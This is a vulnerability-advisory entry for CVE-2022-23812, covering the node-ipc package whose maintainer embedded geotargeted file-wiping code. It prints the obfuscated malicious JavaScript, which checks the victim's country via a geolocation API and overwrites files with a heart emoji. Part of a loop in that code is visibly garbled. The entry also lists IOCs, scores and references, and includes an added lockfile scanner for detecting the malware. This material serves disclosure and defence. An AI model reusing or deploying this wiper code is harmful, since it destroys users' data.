CVE-2022-23812
Published 2022-03-16
Priority P2 · 77 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW: VulnCheck KEV (exploited in the wild)
EPSS: 4.16% (89.6th percentile)
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code that targets users with an IP located in Russia or Belarus and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package, which includes potentially undesired behavior.

Malicious code (**Note:** don't run it!):

```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) { return; }
  const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = Buffer.from("Li8=", "base64");
      const o = Buffer.from("Li4v", "base64");
      const r = Buffer.from("Li4vLi4v", "base64");
      const f = Buffer.from("Lw==", "base64");
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
      const e = Buffer.from("cnVzc2lh", "base64");
      const i = Buffer.from("YmVsYXJ1cw==", "base64");
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
  if (!a.existsSync(n)) { return; }
  let r = [];
  try { r = a.readdirSync(n); } catch (t) {}
  const f = [];
  const c = Buffer.from("4p2k77iP", "base64");
  for (var e = 0; e 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️
      } catch (t) {}
    }
  }
  return f;
}
const ssl = true;
export { ssl as default, ssl };
```
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| node-ipc_project | node-ipc | >= 10.1.1 < unspecified | unspecified |
| node-ipc_project | node-ipc | >= 10.1.1 < 10.1.3 | 10.1.3 |
| node-ipc_project | node-ipc | >= 10.1.1 < 10.1.3 | 10.1.3 |
| node-ipc_project | node-ipc | >= 11.0.0 | — |
| node-ipc_project | node-ipc | >= unspecified < 10.1.3 | 10.1.3 |
Detection & IOCs (extracted from sources)
- Detect outbound HTTPS GET requests to api.ipgeolocation.io with the specific API key ae511e1627824a968aaaa758a5309154 in the query string, originating from Node.js processes; this is the geolocation beacon used to determine whether the victim is in Russia or Belarus before triggering the payload.
- Alert on mass file overwrites where file contents are replaced with the heart emoji (❤️, UTF-8 bytes E2 9D A4 EF B8 8F). The malware recursively traverses ./, ../, ../../ and / and calls fs.writeFile on every reachable file.
- Flag the presence of node-ipc versions 10.1.1 or 10.1.2 in package-lock.json or node_modules; these are the confirmed malicious versions removed from the NPM registry.
- Detect the base64-encoded strings 'Li8=', 'Li4v', 'Li4vLi4v', 'Lw==', 'Y291bnRyeV9uYW1l', 'cnVzc2lh', 'YmVsYXJ1cw==', '4p2k77iP' within JavaScript source files or evaluated strings; these are obfuscation markers unique to this malware.
- From node-ipc version 11.0.0 onwards, the malicious behavior is delegated to the imported 'peacenotwar' package rather than being inline; audit dependency trees for peacenotwar as a transitive dependency.
- The setTimeout delay is randomized (Math.ceil(Math.random() * 1e3) ms) and execution is probabilistic (only fires ~75% of the time via the Math.round(Math.random() * 4) > 1 check); sandbox detonation may not trigger on first run, so repeated execution is needed for reliable detection.
- The geolocation API key (ae511e1627824a968aaaa758a5309154) is hardcoded in the malware. If the key is revoked or the endpoint changes, the geolocation check silently fails and no file destruction occurs; victims outside Russia/Belarus are unaffected by the destructive payload, but the beacon call still fires.
- Versions 10.1.1 and 10.1.2 were removed from the NPM registry; version 10.1.3 is the patched release. Environments with cached or vendored copies of 10.1.1/10.1.2 remain at risk even after registry removal.
- The payload only triggers when the resolved country_name field (lowercased) contains 'russia' or 'belarus'. VPN or proxy usage by victims in those countries would bypass the geolocation check and prevent file destruction.
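A scanner for the lockfile and source-marker indicators listed above, as an added example that is not part of this advisory or the node-ipc project. It handles both the npm v2/v3 "packages" map and the v1 nested "dependencies" tree; the sample lockfile and source snippet are constructed, and the peacenotwar version in the sample is a placeholder.

```javascript
// Added example (not the advisory's or node-ipc's code): scan an npm lockfile
// and JavaScript source for the indicators above. Sample data is constructed.
const MALICIOUS_VERSIONS = new Set(["10.1.1", "10.1.2"]);
const MARKERS = ["Li8=", "Li4v", "Li4vLi4v", "Lw==", "Y291bnRyeV9uYW1l",
                 "cnVzc2lh", "YmVsYXJ1cw==", "4p2k77iP"];

// Flatten a package-lock into [name, version] pairs: v2/v3 "packages" map
// (keys are node_modules paths) or the v1 nested "dependencies" tree.
function lockEntries(lock) {
  const entries = [];
  if (lock.packages) {
    for (const [p, pkg] of Object.entries(lock.packages)) {
      if (p) entries.push([p.split("node_modules/").pop(), pkg.version]);
    }
    return entries;
  }
  const walk = (deps) => Object.entries(deps || {}).forEach(([name, dep]) => {
    entries.push([name, dep.version]);
    walk(dep.dependencies);
  });
  walk(lock.dependencies);
  return entries;
}

// Flag node-ipc 10.1.1/10.1.2 (inline wiper), node-ipc >= 11.0.0 (imports
// peacenotwar) and peacenotwar itself, wherever it sits in the tree.
function scanLockfile(lock) {
  const findings = [];
  for (const [name, version] of lockEntries(lock)) {
    const major = Number(String(version).split(".")[0]);
    if (name === "node-ipc" && MALICIOUS_VERSIONS.has(version)) {
      findings.push(`node-ipc@${version}: confirmed malicious release`);
    } else if (name === "node-ipc" && major >= 11) {
      findings.push(`node-ipc@${version}: imports peacenotwar`);
    } else if (name === "peacenotwar") {
      findings.push(`peacenotwar@${version}: protestware dependency`);
    }
  }
  return findings;
}
// Markers found in a source text. "Lw==" and "Li8=" also occur in unrelated
// base64, so treat several hits together, not a single one, as the signal.
function scanSource(text) {
  return MARKERS.filter((m) => text.includes(m));
}
const SAMPLE_LOCK = { lockfileVersion: 3, packages: { // constructed sample
  "": { name: "sample-app", version: "1.0.0" },
  "node_modules/node-ipc": { version: "10.1.2" },
  "node_modules/some-lib/node_modules/peacenotwar": { version: "1.0.0" },
} };
const SAMPLE_SOURCE = 'const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");' +
  ' const h = Buffer.from("4p2k77iP", "base64");'; // constructed snippet
```

Run it against a real project's package-lock.json with `scanLockfile(JSON.parse(fs.readFileSync("package-lock.json", "utf8")))`; a clean tree returns an empty array.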
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- VulnCheck: 9.8 CRITICAL
GHSA (2022-03-16): CVE-2022-23812 [CRITICAL] CWE-506 Embedded Malicious Code in node-ipc
The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files dependent upon the geo-location of the user IP address. The maintainer removed the malicious code in version 10.1.3.
OSV (2022-03-16): CVE-2022-23812 [CRITICAL] Embedded Malicious Code in node-ipc
The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files dependent upon the geo-location of the user IP address. The maintainer removed the malicious code in version 10.1.3.
VulnCheck (2022, CVSS 9.8): CVE-2022-23812 [CRITICAL] NPM Package node-ipc Vulnerability
No detection rules found.
No public exploits indexed.
References
- https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
- https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580
- https://github.com/RIAEvangelist/node-ipc/issues/233
- https://github.com/RIAEvangelist/node-ipc/issues/236
- https://security.netapp.com/advisory/ntap-20220407-0005/
- https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370